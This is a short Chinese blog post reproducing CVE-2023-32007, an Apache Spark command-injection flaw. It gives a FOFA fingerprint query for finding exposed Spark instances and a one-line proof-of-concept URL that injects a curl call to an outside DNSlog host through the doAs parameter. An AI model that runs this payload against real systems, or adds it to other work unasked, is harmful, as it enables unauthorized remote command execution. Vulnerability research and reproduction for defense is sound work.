当前位置: 首页 > news >正文

Apache Spark远程代码执行漏洞(CVE-2023-32007)漏洞复现

news 2025/8/9 12:07:02

漏洞描述

Apache Spark是美国阿帕奇(Apache)基金会的一款支持非循环数据流和内存计算的大规模数据处理引擎。

Apache Spark 3.4.0之前版本存在命令注入漏洞,该漏洞源于如果ACL启用后,HttpSecurityFilter中的代码路径可以允许通过提供任意用户名来执行模拟,这将导致任意shell命令执行。

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

app="APACHE-Spark-Jobs"

漏洞复现

http://ip:port/jobs/?doAs=curl+5fyjku.dnslog.cn
在这里插入图片描述
在这里插入图片描述

修复方案

http://www.lryc.cn/news/137497.html

相关文章:

  • 春秋云镜 :CVE-2020-21650(MyuCMS后台rce)
  • 测试框架pytest教程(7)实现 xunit 风格的setup
  • 用队列实现栈
  • Anolis 8.6 下 Redis 7.2.0 集群搭建和配置
  • 综合能源系统(8)——综合能源系统支撑技术
  • MySQL5.7数据目录结构
  • Python Opencv实践 - 图像直方图均衡化
  • GAN:对抗生成网络,前向传播和后巷传播的区别
  • 压力变送器的功能与应用
  • 排序算法:选择排序
  • Windows运行Spark所需的Hadoop安装
  • KusionStack使用文档
  • ONLYOFFICE 文档如何与 Alfresco 进行集成
  • PostgreSQL下载路径与安装步骤
  • 如何在PHP中编写条件语句
  • LLM架构自注意力机制Transformers architecture Attention is all you need
  • 计算机网络 QA
  • 安果天气预报 产品介绍
  • net start Mysql 启动服务时 ,显示“Mysql服务正在启动 Mysql服务无法启动 服务没有报告任何错误
  • DAY24
  • Redis过期数据的删除策略
  • 如何使用CSS实现一个拖拽排序效果?
  • leetcode 118.杨辉三角
  • 微服务框架之SpringBoot面试题汇总
  • Promise详解
  • Oracle 查询(当天,月,年)的数据
  • 什么是梯度下降
  • 开黑啦kook 机器人开发 PHP swoole Liunx 服务器(宝塔)
  • Vue 中hash 模式与 history 模式的区别
  • Dockerfile推送私有仓库的两个案例